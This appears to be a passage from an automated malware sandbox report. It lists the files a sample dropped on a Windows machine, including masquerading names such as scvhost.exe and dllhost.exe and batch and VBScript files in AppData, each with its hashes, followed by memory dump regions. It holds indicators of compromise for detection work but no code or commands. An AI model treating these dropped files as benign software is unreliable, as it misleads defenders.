46cd75111d2654910f776052cc30b5e1fceb5aee

SHA256
a9dd0275131105df5611f31a9e6fbf27fd77d0a35d1a73a9f4941235fbc68bd7

SHA512
b2ee469ea5a6f49bbdd553363baa8ebad2baf13a658d0d0c167fde7b82eb77a417d519420db64f325d0224f133e3c5267df3aa56c11891d740d6742adf84dbe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\unicodedata.pyd

Filesize
293KB

MD5
bb3fca6f17c9510b6fb42101fe802e3c

SHA1
cb576f3dbb95dc5420d740fd6d7109ef2da8a99d

SHA256
5e2f1bbfe3743a81b00717011094798929a764f64037bedb7ea3d2ed6548eb87

SHA512
05171c867a5d373d4f6420136b6ac29fa846a85b30085f9d7fabcbb4d902afee00716dd52010ed90e97c18e6cb4e915f13f31a15b2d8507e3a6cfa80e513b6a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_reyvuap2.1af.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\d737cf48-d52f-4c74-809a-6bfab3ce72d2.vbs

Filesize
512B

MD5
0259e8d14dd15d82f94955cf1c0d9595

SHA1
d8f099c04e68c953b493704f5e7618a4bd5dd533

SHA256
914d0f9551f93ebce98ec55214118818459236b80705882fb975622c2385341b

SHA512
6cfeb57b55ffd03892c6b0405e8cace318fcd5d895772b587a9f76f51fa10d119571d51b42004ebfa7de97bd958e683c366c1b592101ad7f9156611ca4a0f419

Download Submit
C:\Users\Admin\AppData\Roaming\AdbWinApi.dll

Filesize
95KB

MD5
ed5a809dc0024d83cbab4fb9933d598d

SHA1
0bc5a82327f8641d9287101e4cc7041af20bad57

SHA256
d60103a5e99bc9888f786ee916f5d6e45493c3247972cb053833803de7e95cf9

SHA512
1fdb74ee5912fbdd2c0cba501e998349fecfbef5f4f743c7978c38996aa7e1f38e8ac750f2dc8f84b8094de3dd6fa3f983a29f290b3fa2cdbdaed691748baf17

Download Submit
C:\Users\Admin\AppData\Roaming\AdbWinUsbApi.dll

Filesize
61KB

MD5
0e24119daf1909e398fa1850b6112077

SHA1
293eedadb3172e756a421790d551e407457e0a8c

SHA256
25207c506d29c4e8dceb61b4bd50e8669ba26012988a43fbf26a890b1e60fc97

SHA512
9cbb26e555ab40b019a446337db58770b9a0c9c08316ff1e1909c4b6d99c00bd33522d05890870a91b4b581e20c7dce87488ab0d22fc3c4bbdd7e9b38f164b43

Download Submit
C:\Users\Admin\AppData\Roaming\adb.exe

Filesize
1.7MB

MD5
884242fb6cbbec1f7711b946ef669e0e

SHA1
7b2bc3c03909e705da759b7c21907683db668cc5

SHA256
65210cb4139672b53acaa2222b1005d036b0b02c437aa47e0e7b616fab0e2f6f

SHA512
c73ed5875dd0a3f0c400794a10336b00602950fa3ff6fb99ce9a772681fb8c5237c5c3cba2d0b7d254e497383d634d3a97342039cc40d295f262c583d0839768

Download Submit
C:\Users\Admin\AppData\Roaming\bat.bat

Filesize
60B

MD5
d55a01e2758ef91cd8ddccc7703517e2

SHA1
0d0d35d7d0007bdc0ddb74feae218b9eb6bb5e56

SHA256
db0c0c5b991e98b03da0dfdc60d3b63af434ef52cf62a523eb28e17f5827f456

SHA512
db9eee55674f8f5639803471159c5373fafddfbab7a36422aa2da05064215f0dd23b6b5772eb936620cf13657944bef9f63d2092cf7cb2c0172ca436fc5fc543

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
3.4MB

MD5
de586ed62cbe8aa67b7d2ea749e37e58

SHA1
3b8f0e80be45995bccd9aad044cf8ceef7fa1fdf

SHA256
041b5ae270b886ab3945f54a4dbdbb0e462ff2e4fa33a3acb0fe8e8d063eff8c

SHA512
57c80030b7524cb868a1afe8a337bbf93c19d9a301b9a28c28a3dee8aca256cf06df3f95cd847dd82e27d6251ff32bcf3d176dfb565ab4c64edc9ee1184d3054

Download Submit
C:\Users\Admin\AppData\Roaming\fastboot.exe

Filesize
833KB

MD5
0875abb1c7b403b3f95631326eafb6c2

SHA1
45faf0c7b005b72145f25186b1a735f282332246

SHA256
d794004af6dfedb5dbf118c20b4fda20ecdb38744191e859f1233287291cf0c7

SHA512
e7749ca3490851c854a036147041c04327203aacd9f9ec6577023ff4adfb9f3ae494baa312dbd12eedce21601ce8a0d2fd20f6f130ed0b2b134ee289db47f09b

Download Submit
C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\1K70CMgSeGxLkKeGse1VkEk.vbe

Filesize
227B

MD5
f2c31772e7c91f2ff0d5a3799216245b

SHA1
7e4229eee244481cc48bf4744cea662676d0b53a

SHA256
fec6e35115ab887bbffc816e64363b321d776f1af26a58e935a54f3568aa437c

SHA512
9f3db7c0ba6ba33840fe00c12a890bbbb9684023129b997d4ae7a986de024086152e1de14f0288fd24de9f8127d82c161c5ccab3e28b22709d249f063ad91ca4

Download Submit
C:\Users\Admin\AppData\Roaming\gsdrgrgsehufgewhtfewutahetgr5s543t\file.vbs

Filesize
34B

MD5
677cc4360477c72cb0ce00406a949c61

SHA1
b679e8c3427f6c5fc47c8ac46cd0e56c9424de05

SHA256
f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b

SHA512
7cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a

Download Submit
C:\Users\Admin\AppData\Roaming\scvhost.exe

Filesize
61KB

MD5
9db6d927f9fa97d5419f15ee5b633b3d

SHA1
832bdd728fc29bd360a3126da5d48dce3a4ebd31

SHA256
c608942ef98e1dd95df33e11104962e91ea360e01b455fbd666f881afc116526

SHA512
2ec400d834a83dee4d2db4074e72029098a7fe0a5f5913f41d82f32cc53f7cf16c7fd6fb2dbe22f30dd8defaa344390c0b46625594b61c15ee2a727766174275

Download Submit
C:\Users\Admin\AppData\Roaming\setup.exe

Filesize
6.9MB

MD5
e6911d67b1557e060469e3bcbb3f1b26

SHA1
d8e26462769918eccae2ca6c15348f810eb6568e

SHA256
1420115bb23121fd0ab3a7d9a6ba8ddcd4a718724b258c8c214403c070f1cb18

SHA512
b19cfb6214209ce31cf10620f199f03c1c3f344109378e69b05b3651322f13f461232954aafddbe6910887d807126b91258f0902c1e54d3e9f0136cbf265a04d

Download Submit
C:\Users\Admin\AppData\Roaming\sus.bat

Filesize
54B

MD5
7b448e495d5ab244be8065bf0b5491d8

SHA1
1177a30a6aad0ed07295e445b57e23b9bfb0c8f8

SHA256
d9daef7c9edb752480402b9e5499049c92018006bca6d51c26d54b5895699090

SHA512
328f5682b4dd5e872f5d6fe364870375323965fe77915aeb983eb5b833bd413b6b3a4159b4fe88ca772e515cb4c010532ef6d2ad80d7e1fb0ce515564380c3be

Download Submit
C:\Users\Admin\AppData\Roaming\vbs.vbs

Filesize
236B

MD5
fc0095fbf5911c7f6a487621fd3f9f30

SHA1
3ff379b9eee2140cf03ecdc72779eee9adfe95e0

SHA256
0001254296d73292f955d193f8922aada45057ffc5de65e8b983f9c6d1140618

SHA512
88752695000e85a029153b5e368b5e45ed085f35170b7c7888b1ca071889d387d8d437ca40013d1137e333f0d3f04d7709efcc5466cd7a554a2da209e20b4f80

Download Submit
memory/1220-378-0x000000001C890000-0x000000001C89C000-memory.dmp

Filesize
48KB

Download
memory/1220-377-0x000000001C880000-0x000000001C888000-memory.dmp

Filesize
32KB

Download
memory/1220-376-0x000000001C870000-0x000000001C878000-memory.dmp

Filesize
32KB

Download
memory/1220-359-0x000000001C410000-0x000000001C422000-memory.dmp

Filesize
72KB

Download
memory/1592-865-0x000000001BF50000-0x000000001BF62000-memory.dmp

Filesize
72KB

Download
memory/1816-53-0x0000000000460000-0x0000000000476000-memory.dmp

Filesize
88KB

Download
memory/1964-646-0x0000000001040000-0x0000000001052000-memory.dmp

Filesize
72KB

Download
memory/1976-65-0x0000000000400000-0x00000000004D9000-memory.dmp

Filesize
868KB

Download
memory/2264-1-0x0000000000BD0000-0x00000000018D8000-memory.dmp

Filesize
13.0MB

Download
memory/2264-0-0x00007FF84DF63000-0x00007FF84DF65000-memory.dmp

Filesize
8KB

Download
memory/2336-368-0x000000001C740000-0x000000001CC68000-memory.dmp

Filesize
5.2MB

Download
memory/2336-372-0x000000001C240000-0x000000001C24C000-memory.dmp

Filesize
48KB

Download
memory/2336-352-0x0000000002CC0000-0x0000000002CC8000-memory.dmp

Filesize
32KB

Download
memory/2336-354-0x000000001BE50000-0x000000001BEA0000-memory.dmp

Filesize
320KB

Download
memory/2336-353-0x0000000002CD0000-0x0000000002CEC000-memory.dmp

Filesize
112KB

Download
memory/2336-351-0x0000000001350000-0x000000000135E000-memory.dmp

Filesize
56KB

Download
memory/2336-355-0x0000000002CF0000-0x0000000002CF8000-memory.dmp

Filesize
32KB

Download
memory/2336-356-0x0000000002D00000-0x0000000002D16000-memory.dmp

Filesize
88KB

Download
memory/2336-369-0x000000001C210000-0x000000001C21C000-memory.dmp

Filesize
48KB

Download
memory/2336-370-0x000000001C220000-0x000000001C228000-memory.dmp

Filesize
32KB

Download
memory/2336-349-0x0000000001340000-0x000000000134E000-memory.dmp

Filesize
56KB

Download
memory/2336-371-0x000000001C230000-0x000000001C23C000-memory.dmp

Filesize
48KB

Download
memory/2336-374-0x000000001C260000-0x000000001C26E000-memory.dmp

Filesize
56KB

Download
memory/2336-348-0x0000000000860000-0x0000000000B78000-memory.dmp

Filesize
3.1MB

Download
memory/2336-375-0x000000001C270000-0x000000001C27E000-memory.dmp

Filesize
56KB

Download
memory/2336-373-0x000000001C250000-0x000000001C25A000-memory.dmp

Filesize
40KB

Download
memory/2336-357-0x0000000002D20000-0x0000000002D28000-memory.dmp

Filesize
32KB

Download
memory/2336-360-0x000000001C150000-0x000000001C15C000-memory.dmp

Filesize
48KB

Download
memory/2336-363-0x000000001C160000-0x000000001C1B6000-memory.dmp

Filesize
344KB

Download
memory/2336-362-0x0000000002D40000-0x0000000002D50000-memory.dmp

Filesize
64KB

Download
memory/2336-364-0x000000001C1B0000-0x000000001C1BC000-memory.dmp

Filesize
48KB

Download
memory/2336-361-0x0000000002D30000-0x0000000002D38000-memory.dmp

Filesize
32KB

Download
memory/2336-365-0x000000001C1C0000-0x000000001C1CC000-memory.dmp

Filesize
48KB

Download
memory/2336-367-0x000000001C1E0000-0x000000001C1F2000-memory.dmp

Filesize
72KB

Download
memory/2336-366-0x000000001C1D0000-0x000000001C1D8000-memory.dmp

Filesize
32KB

Download
memory/2336-358-0x0000000002D50000-0x0000000002D62000-memory.dmp

Filesize
72KB

Download
memory/2356-191-0x000002723E6B0000-0x000002723E6D2000-memory.dmp

Filesize
136KB

Download
memory/2680-31-0x0000000000400000-0x00000000005D7000-memory.dmp

Filesize
1.8MB

Download
memory/3824-880-0x000000001C390000-0x000000001C3A2000-memory.dmp

Filesize
72KB

Download
memory/4880-819-0x00007FF854270000-0x00007FF85429E000-memory.dmp

Filesize
184KB

Download
memory/4880-157-0x00007FF85D670000-0x00007FF85D689000-memory.dmp

Filesize
100KB

Download
memory/4880-167-0x00007FF854270000-0x00007FF85429E000-memory.dmp

Filesize
184KB

Download
memory/4880-470-0x00007FF848D70000-0x00007FF848EE3000-memory.dmp

Filesize
1.4MB

Download
memory/4880-161-0x00007FF848D70000-0x00007FF848EE3000-memory.dmp

Filesize
1.4MB

Download
memory/4880-147-0x00007FF866CE0000-0x00007FF866CEF000-memory.dmp

Filesize
60KB

Download
memory/4880-176-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp

Filesize
144KB

Download
memory/4880-345-0x00007FF8571D0000-0x00007FF8571F3000-memory.dmp

Filesize
140KB

Download
memory/4880-163-0x00007FF85C700000-0x00007FF85C719000-memory.dmp

Filesize
100KB

Download
memory/4880-173-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp

Filesize
5.9MB

Download
memory/4880-171-0x00007FF849070000-0x00007FF849128000-memory.dmp

Filesize
736KB

Download
memory/4880-174-0x00007FF8483C0000-0x00007FF848735000-memory.dmp

Filesize
3.5MB

Download
memory/4880-165-0x00007FF85CFB0000-0x00007FF85CFBD000-memory.dmp

Filesize
52KB

Download
memory/4880-850-0x00007FF8571D0000-0x00007FF8571F3000-memory.dmp

Filesize
140KB

Download
memory/4880-155-0x00007FF858580000-0x00007FF8585AD000-memory.dmp

Filesize
180KB

Download
memory/4880-830-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp

Filesize
5.9MB

Download
memory/4880-159-0x00007FF8571D0000-0x00007FF8571F3000-memory.dmp

Filesize
140KB

Download
memory/4880-810-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp

Filesize
5.9MB

Download
memory/4880-825-0x00007FF85C700000-0x00007FF85C719000-memory.dmp

Filesize
100KB

Download
memory/4880-821-0x00007FF8483C0000-0x00007FF848735000-memory.dmp

Filesize
3.5MB

Download
memory/4880-820-0x00007FF849070000-0x00007FF849128000-memory.dmp

Filesize
736KB

Download
memory/4880-181-0x00007FF8482A0000-0x00007FF8483BC000-memory.dmp

Filesize
1.1MB

Download
memory/4880-172-0x0000028001E80000-0x00000280021F5000-memory.dmp

Filesize
3.5MB

Download
memory/4880-811-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp

Filesize
144KB

Download
memory/4880-111-0x00007FF84AA40000-0x00007FF84B028000-memory.dmp

Filesize
5.9MB

Download
memory/4880-855-0x00007FF849070000-0x00007FF849128000-memory.dmp

Filesize
736KB

Download
memory/4880-854-0x00007FF854270000-0x00007FF85429E000-memory.dmp

Filesize
184KB

Download
memory/4880-853-0x00007FF85CFB0000-0x00007FF85CFBD000-memory.dmp

Filesize
52KB

Download
memory/4880-852-0x00007FF85C700000-0x00007FF85C719000-memory.dmp

Filesize
100KB

Download
memory/4880-851-0x00007FF848D70000-0x00007FF848EE3000-memory.dmp

Filesize
1.4MB

Download
memory/4880-849-0x00007FF85D670000-0x00007FF85D689000-memory.dmp

Filesize
100KB

Download
memory/4880-848-0x00007FF858580000-0x00007FF8585AD000-memory.dmp

Filesize
180KB

Download
memory/4880-847-0x00007FF866CE0000-0x00007FF866CEF000-memory.dmp

Filesize
60KB

Download
memory/4880-846-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp

Filesize
144KB

Download
memory/4880-845-0x00007FF8483C0000-0x00007FF848735000-memory.dmp

Filesize
3.5MB

Download
memory/4880-844-0x00007FF8482A0000-0x00007FF8483BC000-memory.dmp

Filesize
1.1MB

Download
memory/4880-843-0x00007FF85CF60000-0x00007FF85CF6D000-memory.dmp

Filesize
52KB

Download
memory/4880-842-0x00007FF85B410000-0x00007FF85B424000-memory.dmp

Filesize
80KB

Download
memory/4880-179-0x00007FF85CF60000-0x00007FF85CF6D000-memory.dmp

Filesize
52KB

Download
memory/4880-146-0x00007FF85F780000-0x00007FF85F7A4000-memory.dmp

Filesize
144KB

Download
memory/4880-177-0x00007FF85B410000-0x00007FF85B424000-memory.dmp

Filesize
80KB

Download
memory/5000-912-0x000000001BB00000-0x000000001BB12000-memory.dmp

Filesize
72KB

Download
memory/5332-941-0x000000001BF10000-0x000000001BF22000-memory.dmp

Filesize
72KB

Download
memory/5944-857-0x0000000003690000-0x00000000036A2000-memory.dmp

Filesize
72KB

Download
memory/7120-890-0x000000001BCF0000-0x000000001BD02000-memory.dmp

Filesize
72KB

Download